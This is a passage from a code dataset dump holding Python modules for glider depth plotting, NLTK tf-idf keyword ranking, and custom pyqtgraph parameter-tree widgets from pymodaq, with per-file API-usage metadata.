datetime64, array, nanmin, nanmax\n from datetime import datetime\n\n x = array(x)\n y = array(y)\n z = ma.masked_invalid(z)\n\n x_time = isinstance(x[0], (datetime, datetime64))\n\n if robust:\n kwargs['vmin'] = nanpercentile(z, 0.5)\n kwargs['vmax'] = nanpercentile(z, 99.5)\n\n if ax is None:\n fig, ax = subplots(1, 1, figsize=[11, 4])\n else:\n fig = ax.get_figure()\n im = ax.scatter(x, y, c=z, rasterized=True, **kwargs)\n\n ax.cb = colorbar(mappable=im, pad=0.02, ax=ax)\n ax.set_xlim(nanmin(x), nanmax(x))\n ax.set_ylim(nanmax(y), nanmin(y))\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('Date' if x_time else 'Dives')\n\n [tick.set_rotation(45) for tick in ax.get_xticklabels()]\n fig.tight_layout()\n\n return ax\n\n @staticmethod\n def bin_size(depth, **hist_kwargs):\n from matplotlib.pyplot import subplots, colorbar\n from matplotlib.colors import LogNorm\n from numpy import abs, diff, isnan, array\n\n depth = array(depth)\n\n x = abs(diff(depth))\n y = depth[1:]\n m = ~(isnan(x) | isnan(y))\n x, y = x[m], y[m]\n\n fig, ax = subplots(1, 1, figsize=[4, 6])\n im = ax.hist2d(x, y, bins=50, norm=LogNorm(),\n rasterized=True, **hist_kwargs)[-1]\n ax.set_ylim(ax.get_ylim()[::-1])\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('$\\Delta$ Depth (m)')\n\n cb = colorbar(mappable=im, ax=ax, fraction=0.1, pad=0.05)\n cb.set_label('Measurement count')\n\n fig.tight_layout()\n return ax\n\n\nif __name__ == '__main__':\n pass\n \"fun people\"\n\n", "sub_path": "buoyancy_glider_utils/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 7778, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.ma.MaskedArray", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.ma", "line_number": 15, 
"usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 25, "usage_type": "name"}, {"api_name": "xarray.DataArray", "line_number": 30, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 32, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 32, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_pdf.backends.backend_pdf.PdfPages", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.backends", "line_number": 49, "usage_type": "attribute"}, {"api_name": "matplotlib.backends.backend_pdf", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.datetime64", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.nanpercentile", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.datetime64", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 181, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.datetime64", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.nanpercentile", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 197, "usage_type": "call"}, {"api_name": 
"numpy.array", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.colors.LogNorm", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 226, "usage_type": "call"}]} +{"seq_id": "456207534", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# from nltk.tokenize import WordPunctTokenizer\nfrom nltk.text import TextCollection\nfrom nltk import ngrams, FreqDist\nimport math\n\n\n# 构造tf-idf corpus (word为单位)\ndef get_corpus_word(all_abs):\n all_abs = [abs.split(' ') for abs in all_abs] # 对所有摘要分词\n corpus = TextCollection(all_abs)\n return corpus\n\n\n# 计算一篇摘要的所有词的tf-idf (以word为单位)\ndef tf_idf_abs(abstract, corpus):\n # abstract = set(abstract.split(' ')) # 对摘要分词\n abstract = set(abstract)\n tf_idf_list = [corpus.tf_idf(word, abstract) for word in abstract]\n return tf_idf_list\n\n\n# 计算n篇摘要的所有词的tf-idf (以word为单位)\ndef tf_idf_abs_all(all_abstract, corpus):\n all_tf_idf = [tf_idf_abs(abs, corpus) for abs in all_abstract]\n return all_tf_idf\n\n # tokenzer = WordPunctTokenizer()\n # all_abstract = [tokenzer.tokenize(abs) for abs in all_abstract] # ��所有摘要分词\n # for abs in all_abstract:\n # tf_idf_list = []\n # for word in abs:\n # # tf = corpus.tf(word,corpus)\n # # idf = corpus.idf(word)\n # tf_idf = corpus.tf_idf(word,corpus)\n # # print(word,': tf=',tf,' idf=',idf,' tf-idf=',tf_idf)\n # tf_idf_list.append(tf_idf)\n # # all_tf_idf.append([abs,tf_idf_list])\n # all_tf_idf.append(tf_idf_list)\n # return all_tf_idf\n\n\n# 统计一篇文档的关键词(整个词组)的tf—idf corpus以word为单位\ndef tf_idf_kw(keywords, corpus):\n tf_idf_dict = {}\n for kw in keywords:\n tf_idf = corpus.tf_idf(kw,corpus)\n tf_idf_dict.update({kw : tf_idf})\n return tf_idf_dict\n\n\n# n_gram\n# 获取单文本的n_gram\n# text:分词后的结果\ndef n_gram(text,n):\n # text = text.split(' ')\n n_grams = ngrams(text,n)\n return [n_gram for n_gram in n_grams]\n\n\n# 获取n篇摘要的n_gram\ndef get_n_gram_list(abs_list, n):\n return [n_gram(abs,n) for abs in abs_list]\n\n\n# 构造corpus n_gram\ndef get_corpus_ngram(n_gram_list):\n return TextCollection(n_gram_list)\n\n\n# 计算一篇摘要的所有词的tf-idf (以n_gram为单位)\ndef tf_idf_abs_n_gram(abs_n_grams, corpus_ngram):\n # for n_gram in set(abs_n_grams):\n # tfidf = corpus_ngram.tf_idf(n_gram,abs_n_grams)\n # print(n_gram,': ', tfidf )\n return [corpus_ngram.tf_idf(n_gram, abs_n_grams) for n_gram in set(abs_n_grams)]\n\n\n\n# 计算n篇摘要的所有词的tf-idf (以n_gram为单位)\ndef tf_idf_abs_all_n_gram(abs_n_gram_list, corpus_ngram):\n return [tf_idf_abs_n_gram(abs_n_grams,corpus_ngram) for abs_n_grams in abs_n_gram_list]\n\n\n# 统计一篇文档的关键词(整个词组)的tf—idf corpus以n_gram为单位\n# ('This', 'paper') ======kw处理成这种格式\ndef tf_idf_kw_n_gram(keywords, corpus_ngram):\n tf_idf_dict = {}\n for kw in keywords:\n kw = tuple([term for term in kw.split(' ')])\n tf_idf = corpus_ngram.tf_idf(kw,corpus_ngram)\n tf_idf_dict.update({kw : tf_idf})\n return tf_idf_dict\n\n\n#  获取一篇文档的关键词在摘要中的tf-idf排名\ndef get_kw_rank(kw_tfidf_dict, tf_idf_abs):\n kw_rank_dict = {}\n # abstract中词的tf - idf去重\n tf_idf_abs = list(set(tf_idf_abs))\n # abstract中词的tf-idf值降序排序\n tf_idf_abs.sort(reverse=True)\n for keyword in kw_tfidf_dict:\n rank = 0\n kw_tfidf = kw_tfidf_dict.get(keyword)\n if kw_tfidf not in tf_idf_abs:\n for tfidf in tf_idf_abs:\n if tfidf > 
kw_tfidf:\n                    continue\n                else:\n                    rank = tf_idf_abs.index(tfidf) + 1  # take the index of the first value smaller than the keyword's tf-idf, +1, as its rank\n                    break\n        else:\n            rank = tf_idf_abs.index(kw_tfidf) + 1\n        kw_rank_dict.update({keyword: rank})\n    return kw_rank_dict\n\n\n# get the tf-idf ranks of the keywords of n documents within their abstracts\ndef get_kw_rank_all(kw_tfidf_dict_list,tf_idf_abs_list):\n    for i in range(len(kw_tfidf_dict_list)):\n        try:\n            get_kw_rank(kw_tfidf_dict_list[i], tf_idf_abs_list[i])\n        except ValueError :\n            print(kw_tfidf_dict_list[i])\n            print(tf_idf_abs_list[i])\n\n    return [get_kw_rank(kw_tfidf_dict_list[i], tf_idf_abs_list[i]) for i in range(len(tf_idf_abs_list))]\n\n\n# get the size of the tf-idf set of n abstracts\ndef get_abs_tfidf_set_num(tf_idf_abs_list):\n    return [len(set(tfidf_abs)) for tfidf_abs in tf_idf_abs_list]\n\n\n\n# custom tf-idf\n# # compute tf (n-gram level)\n# def tf(word, n_grams):\n#     count = FreqDist(n_grams)\n#     return count[word] / sum(count.values())\n#\n#\n# # compute df (n-gram level)\n# def n_containing(word, n_gram_list):\n#     count_list = [FreqDist(n_grams) for n_grams in n_gram_list]\n#     return sum(1 for count in count_list if word in count)\n#\n#\n# # compute idf (n-gram level)\n# def idf(word, n_gram_list):\n#     count_list = [FreqDist(n_grams) for n_grams in n_gram_list]\n#     return math.log(len(count_list) / (1 + n_containing(word, count_list)))\n#\n# # compute tf-idf (n-gram level)\n# def tfidf(word, n_grams, n_gram_list):\n#     return tf(word, n_grams) * idf(word, n_gram_list)\n#\n#\n# # compute the tf-idf of all terms in one abstract (n-gram level)\n# def tf_idf_abs_n_gram(abs_n_grams, abs_n_gram_list):\n#     return [tfidf(n_gram, abs_n_grams, abs_n_gram_list) for n_gram in abs_n_grams]\n#\n#\n# # compute the tf-idf of all terms in n abstracts (n-gram level)\n# def tf_idf_abs_all_n_gram(abs_n_gram_list):\n#     return [tf_idf_abs_n_gram(abs_n_grams,abs_n_gram_list) for abs_n_grams in abs_n_gram_list]\n#\n#\n# # tf-idf of a document's keywords (whole phrases); the corpus is n-gram level\n# def tf_idf_kw_n_gram(keywords, abs_n_grams,abs_n_gram_list):\n#     tf_idf_dict = {}\n#     for kw in keywords:\n#         tf_idf = tfidf(kw,abs_n_grams,abs_n_gram_list)\n#         tf_idf_dict.update({kw : tf_idf})\n#     return tf_idf_dict", "sub_path": "static_count/tf_idf.py", "file_name": "tf_idf.py", "file_ext": "py", "file_size_in_byte": 5906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nltk.text.TextCollection", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 58, "usage_type": "call"}, {"api_name": "nltk.text.TextCollection", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "50380483", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 4 10:59:53 2017\n\n@author: Weber\n\n\"\"\"\nimport sys\nfrom qtpy import QtWidgets, QtGui\nfrom qtpy.QtCore import Slot, Signal, Qt, QDate, QDateTime, QTime, QByteArray, QSize\nfrom pyqtgraph.widgets import ColorButton, SpinBox\nimport pyqtgraph.parametertree.parameterTypes as pTypes\nfrom pyqtgraph.parametertree import Parameter, ParameterItem\nfrom pyqtgraph.parametertree.Parameter import registerParameterType\nfrom pyqtgraph import functions as fn\nfrom pyqtgraph.colormap import ColorMap\nfrom pymodaq.daq_utils.daq_utils import scroll_log, scroll_linear\nfrom collections import OrderedDict\nfrom decimal import Decimal as D\n\nfrom pymodaq.daq_utils.gui_utils.widgets import QLED\n\nfrom pathlib import Path\nimport numpy as np\nimport os\n\n\nclass GroupParameterItemCustom(pTypes.GroupParameterItem):\n    \"\"\"\n    | Group parameters are used mainly as a generic parent item that holds (and groups!) a set of child parameters. 
It also provides a simple mechanism for displaying a button or combo that can be used to add new parameters to the group.\n |\n | This customization is made in order to respond to the visible options.\n | Overwrite the optsChanged method from GroupParameterItem class.\n\n \"\"\"\n\n def __init__(self, param, depth):\n pTypes.GroupParameterItem.__init__(self, param, depth)\n\n def optsChanged(self, param, changed):\n if 'addList' in changed:\n self.updateAddList()\n elif 'visible' in changed:\n self.setHidden(not changed['visible'])\n\n\nclass GroupParameterCustom(pTypes.GroupParameter):\n \"\"\"\n |\n | Group parameters are used mainly as a generic parent item that holds (and groups!) a set of child parameters.\n |\n | It also provides a simple mechanism for displaying a button or combo that can be used to add new parameters to the group.\n |\n | To enable this, the group must be initialized with the 'addText' option (the text will be displayed on a button which, when clicked, will cause addNew() to be called).\n |\n | If the 'addList' option is specified as well, then a dropdown-list of addable items will be displayed instead of a button.\n |\n\n ============== ========================================\n **Attributes** **Type**\n itemClass instance of GroupParameterItemCustom\n ============== ========================================\n \"\"\"\n itemClass = GroupParameterItemCustom\n\n\nregisterParameterType('group', GroupParameterCustom, override=True)\n\n\nclass SpinBoxCustom(SpinBox.SpinBox):\n def __init__(self, parent=None, value=0.0, **kwargs):\n super().__init__(parent, value, **kwargs)\n\n def setOpts(self, **opts):\n \"\"\"\n Overriden class to add the field visible in the options.\n\n =============== =========== ======================\n **Parameters** **Type** **Description**\n *opts* string the vararg options\n =============== =========== ======================\n \"\"\"\n # print opts\n for k in opts:\n if k == 'bounds' or k == 'limits':\n self.setMinimum(opts[k][0], update=False)\n self.setMaximum(opts[k][1], update=False)\n elif k == 'min':\n self.setMinimum(opts[k], update=False)\n elif k == 'max':\n self.setMaximum(opts[k], update=False)\n elif k in ['step', 'minStep']:\n self.opts[k] = D(str(opts[k]))\n elif k == 'value':\n pass # # don't set value until bounds have been set\n elif k == 'visible':\n self.setVisible(opts[k])\n elif k == 'readonly':\n self.setReadOnly(opts[k])\n elif k == 'enabled':\n self.setEnabled(opts[k])\n elif k == 'format':\n self.opts[k] = opts[k]\n elif k in self.opts:\n self.opts[k] = opts[k]\n elif 'tip' in k:\n self.opts[k] = opts[k]\n self.setToolTip(opts[k])\n if 'value' in opts:\n self.setValue(opts['value'])\n\n # # If bounds have changed, update value to match\n if 'bounds' in opts and 'value' not in opts:\n self.setValue()\n\n # # sanity checks:\n if self.opts['int']:\n if 'step' in opts:\n step = opts['step']\n # # not necessary..\n # if int(step) != step:\n # raise Exception('Integer SpinBox must have integer step size.')\n else:\n self.opts['step'] = int(self.opts['step'])\n\n if 'minStep' in opts:\n step = opts['minStep']\n if int(step) != step:\n raise Exception('Integer SpinBox must have integer minStep size.')\n else:\n ms = int(self.opts.get('minStep', 1))\n if ms < 1:\n ms = 1\n self.opts['minStep'] = ms\n\n if 'delay' in opts:\n self.proxy.setDelay(opts['delay'])\n\n self.updateText()\n\n\nclass Pixmap_check(QtWidgets.QWidget):\n \"\"\" value of this parameter is a dict with checked, data for the pixmap and optionally path in h5 
node\n \"\"\"\n\n # valuechanged=Signal(dict)\n\n def __init__(self):\n\n super().__init__()\n self.path = ''\n self.data = None\n self.checked = False\n self.initUI()\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n self.ver_layout = QtWidgets.QVBoxLayout()\n self.label = QtWidgets.QLabel()\n self.checkbox = QtWidgets.QCheckBox('Show/Hide')\n self.info = QtWidgets.QLineEdit()\n self.info.setReadOnly(True)\n self.checkbox.setChecked(False)\n self.ver_layout.addWidget(self.label)\n self.ver_layout.addWidget(self.info)\n self.ver_layout.addWidget(self.checkbox)\n self.ver_layout.setSpacing(0)\n self.ver_layout.setContentsMargins(0, 0, 0, 0)\n self.setLayout(self.ver_layout)\n\n def setValue(self, dic):\n if 'data' in dic:\n if not isinstance(dic['data'], QtGui.QPixmap):\n self.data = QByteArray(dic['data'])\n im = QtGui.QImage.fromData(self.data)\n a = QtGui.QPixmap.fromImage(im)\n else:\n a = dic['data']\n else:\n a = dic['pixmap']\n if 'path' in dic:\n self.path = dic['path']\n else:\n self.path = ''\n if 'info' in dic:\n info = dic['info']\n else:\n info = ''\n self.label.setPixmap(a)\n self.checkbox.setChecked(dic['checked'])\n self.info.setText(info)\n # self.valuechanged.emit(dic)\n\n def value(self):\n return dict(pixmap=self.label.pixmap(), checked=self.checkbox.isChecked(), path=self.path)\n\n\nclass QTimeCustom(QtWidgets.QTimeEdit):\n def __init__(self, *args, **kwargs):\n super(QTimeCustom, self).__init__(*args, **kwargs)\n self.minutes_increment = 1\n self.timeChanged.connect(self.updateTime)\n\n def setTime(self, time):\n hours = time.hour()\n minutes = time.minute()\n\n minutes = int(np.round(minutes / self.minutes_increment) * self.minutes_increment)\n if minutes == 60:\n minutes = 0\n hours += 1\n\n time.setHMS(hours, minutes, 0)\n\n return super(QTimeCustom, self).setTime(time)\n\n def setMinuteIncrement(self, minutes_increment):\n self.minutes_increment = minutes_increment\n self.updateTime(self.time())\n\n @Slot(QTime)\n def updateTime(self, time):\n self.setTime(time)\n\n\nclass SliderSpinBox(QtWidgets.QWidget):\n\n def __init__(self, *args, subtype='lin', **kwargs):\n\n super().__init__()\n self.subtype = subtype\n self.initUI(*args, **kwargs)\n\n self.valueChanged = self.spinbox.valueChanged # (value) for compatibility with QSpinBox\n self.sigValueChanged = self.spinbox.sigValueChanged # (self)\n self.sigValueChanging = self.spinbox.sigValueChanging # (self, value) sent immediately; no delay.\n\n @property\n def opts(self):\n return self.spinbox.opts\n\n @opts.setter\n def opts(self, **opts):\n self.setOpts(**opts)\n\n def setOpts(self, **opts):\n self.spinbox.setOpts(**opts)\n if 'visible' in opts:\n self.slider.setVisible(opts['visible'])\n\n def insert_widget(self,widget, row=0):\n self.vlayout.insertWidget(row, widget)\n\n def initUI(self, *args, **kwargs):\n \"\"\"\n Init the User Interface.\n \"\"\"\n self.vlayout = QtWidgets.QVBoxLayout()\n self.slider = QtWidgets.QSlider(Qt.Horizontal)\n self.slider.setMinimumWidth(50)\n self.slider.setMinimum(0)\n self.slider.setMaximum(100)\n if 'value' in kwargs:\n value = kwargs.pop('value')\n else:\n if 'bounds' in kwargs:\n value = kwargs['bounds'][0]\n else:\n value = 1\n self.spinbox = SpinBoxCustom(parent=None, value=value, **kwargs)\n\n self.vlayout.addWidget(self.slider)\n self.vlayout.addWidget(self.spinbox)\n self.vlayout.setSpacing(0)\n self.vlayout.setContentsMargins(0, 0, 0, 0)\n self.setLayout(self.vlayout)\n\n self.slider.valueChanged.connect(self.update_spinbox)\n 
self.spinbox.valueChanged.connect(self.update_slide)\n\n def update_spinbox(self, val):\n \"\"\"\n val is a percentage [0-100] used in order to set the spinbox value between its min and max\n \"\"\"\n min_val = float(self.opts['bounds'][0])\n max_val = float(self.opts['bounds'][1])\n if self.subtype == 'log':\n val_out = scroll_log(val, min_val, max_val)\n else:\n val_out = scroll_linear(val, min_val, max_val)\n try:\n self.slider.valueChanged.disconnect(self.update_spinbox)\n self.spinbox.valueChanged.disconnect(self.update_slide)\n except Exception:\n pass\n self.spinbox.setValue(val_out)\n\n self.slider.valueChanged.connect(self.update_spinbox)\n self.spinbox.valueChanged.connect(self.update_slide)\n\n def update_slide(self, val):\n \"\"\"\n val is the spinbox value between its min and max\n \"\"\"\n min_val = float(self.opts['bounds'][0])\n max_val = float(self.opts['bounds'][1])\n\n try:\n self.slider.valueChanged.disconnect(self.update_spinbox)\n self.spinbox.valueChanged.disconnect(self.update_slide)\n except Exception:\n pass\n self.slider.setValue(int((val - min_val) / (max_val - min_val) * 100))\n self.slider.valueChanged.connect(self.update_spinbox)\n self.spinbox.valueChanged.connect(self.update_slide)\n\n def setValue(self, val):\n self.spinbox.setValue(val)\n\n def value(self):\n return self.spinbox.value()\n\n\nclass WidgetParameterItem(pTypes.WidgetParameterItem):\n \"\"\"\n This is a subclass of widget parameteritem in order to deal with the visiblily of the spinbox when parameter visibility os toggled.\n \"\"\"\n\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n if 'enabled' in self.param.opts:\n self.displayLabel.setEnabled(self.param.opts['enabled'])\n\n def makeWidget(self):\n \"\"\"\n | Return a single widget that should be placed in the second tree column.\n | The widget must be given three attributes:\n\n ========== ============================================================\n sigChanged a signal that is emitted when the widget's value is changed\n value a function that returns the value\n setValue a function that sets the value\n ========== ============================================================\n\n | This is a good function to override in subclasses.\n\n \"\"\"\n opts = self.param.opts\n t = opts['type']\n if t in ('int', 'float', 'slide'):\n defs = {\n 'value': 0, 'min': None, 'max': None,\n 'step': 1.0, 'dec': False,\n 'siPrefix': False, 'suffix': '', 'decimals': 12,\n }\n if t == 'int':\n defs['int'] = True\n defs['minStep'] = 1.0\n for k in defs:\n if k in opts:\n defs[k] = opts[k]\n if 'limits' in opts:\n defs['bounds'] = opts['limits']\n if t in ('int', 'float'):\n w = SpinBoxCustom()\n else:\n if 'subtype' not in opts:\n opts['subtype'] = 'linear'\n if 'limits' not in opts:\n defs['bounds'] = (0., self.param.value()) #max value set to default value when no max given\n else:\n defs['bounds'] = opts['limits']\n\n w = SliderSpinBox(subtype=opts['subtype'], bounds=defs['bounds'], value=defs['value'])\n self.setSizeHint(1, QSize(50, 50))\n\n\n w.setOpts(**defs)\n w.sigChanged = w.sigValueChanged\n w.sigChanging = w.sigValueChanging\n\n elif t == 'bool':\n w = QtWidgets.QCheckBox()\n w.sigChanged = w.toggled\n w.value = w.isChecked\n w.setValue = w.setChecked\n w.setEnabled(not opts.get('readonly', False))\n self.hideWidget = False\n elif t == 'bool_push':\n w = QtWidgets.QPushButton()\n if 'label' in opts:\n w.setText(opts['label'])\n elif 'title' in opts:\n w.setText(opts['title'])\n else:\n 
w.setText(opts['name'])\n # w.setMaximumWidth(50)\n w.setCheckable(True)\n w.sigChanged = w.toggled\n w.value = w.isChecked\n w.setValue = w.setChecked\n w.setEnabled(not opts.get('readonly', False))\n self.hideWidget = False\n elif t == 'led_push':\n w = QLED()\n w.clickable = True\n w.set_as_false()\n w.sigChanged = w.value_changed\n w.value = w.get_state\n w.setValue = w.set_as\n self.hideWidget = False\n elif t == 'str':\n w = QtWidgets.QLineEdit()\n w.sigChanged = w.editingFinished\n w.value = lambda: str(w.text())\n w.setValue = lambda v: w.setText(str(v))\n w.sigChanging = w.textChanged\n elif t == 'color':\n w = ColorButton.ColorButton()\n w.sigChanged = w.sigColorChanged\n w.sigChanging = w.sigColorChanging\n w.value = w.color\n w.setValue = w.setColor\n self.hideWidget = False\n w.setFlat(True)\n w.setEnabled(not opts.get('readonly', False))\n elif t == 'colormap':\n from pyqtgraph.widgets.GradientWidget import GradientWidget # # need this here to avoid import loop\n w = GradientWidget(orientation='bottom')\n w.sigChanged = w.sigGradientChangeFinished\n w.sigChanging = w.sigGradientChanged\n w.value = w.colorMap\n w.setValue = w.setColorMap\n self.hideWidget = False\n elif t == 'date_time':\n w = QtWidgets.QDateTimeEdit(QDateTime(QDate.currentDate(), QTime.currentTime()))\n w.setCalendarPopup(True)\n if 'format' in opts:\n w.setDisplayFormat(opts['format'])\n else:\n w.setDisplayFormat('dd/MM/yyyy hh:mm')\n w.sigChanged = w.dateTimeChanged\n w.value = w.dateTime\n w.setValue = w.setDateTime\n elif t == 'date':\n w = QtWidgets.QDateEdit(QDate(QDate.currentDate()))\n w.setCalendarPopup(True)\n if 'format' in opts:\n w.setDisplayFormat(opts['format'])\n else:\n w.setDisplayFormat('dd/MM/yyyy')\n w.sigChanged = w.dateChanged\n w.value = w.date\n w.setValue = w.setDate\n\n elif t == 'time':\n w = QTimeCustom(QTime(QTime.currentTime()))\n if 'minutes_increment' in opts:\n w.setMinuteIncrement(opts['minutes_increment'])\n w.setDisplayFormat('hh:mm')\n w.sigChanged = w.timeChanged\n w.value = w.time\n w.setValue = w.setTime\n\n elif t == 'led':\n w = QLED()\n w.clickable = False\n w.set_as_false()\n w.sigChanged = w.value_changed\n w.value = w.get_state\n w.setValue = w.set_as\n elif t == 'pixmap':\n w = QtWidgets.QLabel()\n w.sigChanged = None\n w.value = w.pixmap\n w.setValue = w.setPixmap\n elif t == 'pixmap_check':\n w = Pixmap_check()\n w.sigChanged = w.checkbox.toggled\n w.value = w.value\n w.setValue = w.setValue\n else:\n raise Exception(\"Unknown type '%s'\" % str(t))\n return w\n\n def limitsChanged(self, param, limits):\n \"\"\"Called when the parameter's limits have changed\"\"\"\n ParameterItem.limitsChanged(self, param, limits)\n\n t = self.param.opts['type']\n if t == 'int' or t == 'float' or t == 'slide':\n self.widget.setOpts(bounds=limits)\n else:\n return # don't know what to do with any other types..\n\n def showEditor(self):\n \"\"\"\n Show the widget attribute.\n \"\"\"\n self.widget.show()\n self.displayLabel.hide()\n self.widget.setFocus(Qt.OtherFocusReason)\n if isinstance(self.widget, SpinBox.SpinBox):\n self.widget.selectNumber() # select the numerical portion of the text for quick editing\n\n\n def hideEditor(self):\n \"\"\"\n Hide the widget attribute.\n \"\"\"\n status = 'led' in self.param.opts['type'] or self.param.opts['type'] == 'pixmap'\n status = not (status or self.param.opts['type'] == 'pixmap_check')\n if status:\n self.widget.hide()\n self.displayLabel.show()\n\n def optsChanged(self, param, opts):\n \"\"\"\n | Called when any options are changed 
that are not name, value, default, or limits.\n |\n | If widget is a SpinBox, pass options straight through.\n | So that only the display label is shown when visible option is toggled.\n\n =============== ================================== ==============================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter the parameter to check\n *opts* string list the associated options list\n =============== ================================== ==============================\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'readonly' in opts:\n self.updateDefaultBtn()\n if isinstance(self.widget, (QtWidgets.QCheckBox, ColorButton.ColorButton)):\n self.widget.setEnabled(not opts['readonly'])\n\n if 'minutes_increment' in opts:\n self.widget.setMinuteIncrement(opts['minutes_increment'])\n\n if 'tip' in opts:\n self.displayLabel.setToolTip(opts['tip'])\n\n # # If widget is a SpinBox, pass options straight through\n if isinstance(self.widget, SpinBoxCustom) or isinstance(self.widget, SliderSpinBox):\n if 'visible' in opts:\n opts.pop('visible')\n self.widget.hide() # so that only the display label is shown when visible option is toggled\n if 'units' in opts and 'suffix' not in opts:\n opts['suffix'] = opts['units']\n self.widget.setOpts(**opts)\n self.updateDisplayLabel()\n\n if 'title' in opts:\n self.setText(0, opts['title']) # void QTreeWidgetItem::setText(int column, const QString &text)\n\n def valueChanged(self, param, val, force=False):\n # # called when the parameter's value has changed\n ParameterItem.valueChanged(self, param, val)\n if self.widget.sigChanged is not None:\n self.widget.sigChanged.disconnect(self.widgetValueChanged)\n\n try:\n if force or val != self.widget.value():\n self.widget.setValue(val)\n self.updateDisplayLabel(val) # # always make sure label is updated, even if values match!\n finally:\n if self.widget.sigChanged is not None:\n self.widget.sigChanged.connect(self.widgetValueChanged)\n self.updateDefaultBtn()\n\n\nclass SimpleParameterCustom(pTypes.SimpleParameter):\n itemClass = WidgetParameterItem\n\n def __init__(self, *args, **kargs):\n pTypes.SimpleParameter.__init__(self, *args, **kargs)\n\n def _interpretValue(self, v):\n fn = {\n 'int': int,\n 'float': float,\n 'bool': bool,\n 'bool_push': bool,\n 'str': str,\n 'color': self._interpColor,\n 'colormap': self._interpColormap,\n 'date_time': QDateTime,\n 'date': QDate,\n 'time': QTime,\n 'led': bool,\n 'led_push': bool,\n 'pixmap': QtWidgets.QLabel,\n 'pixmap_check': dict,\n 'slide': float\n }[self.opts['type']]\n return fn(v)\n\n def _interpColor(self, v):\n return fn.mkColor(v)\n\n def _interpColormap(self, v):\n if not isinstance(v, ColorMap):\n raise TypeError(\"Cannot set colormap parameter from object %r\" % v)\n return v\n\n def setLimits(self, limits):\n \"\"\"Set limits on the acceptable values for this parameter.\n The format of limits depends on the type of the parameter and\n some parameters do not make use of limits at all.\"\"\"\n if 'limits' in self.opts and self.opts['limits'] == limits:\n return\n self.opts['limits'] = limits\n self.sigLimitsChanged.emit(self, limits)\n if self.opts['type'] in ['int', 'float', 'slide']:\n if self.value() > limits[1]:\n self.setValue(limits[1])\n elif self.value() < limits[0]:\n self.setValue(limits[0])\n return limits\n\n\nregisterParameterType('int', 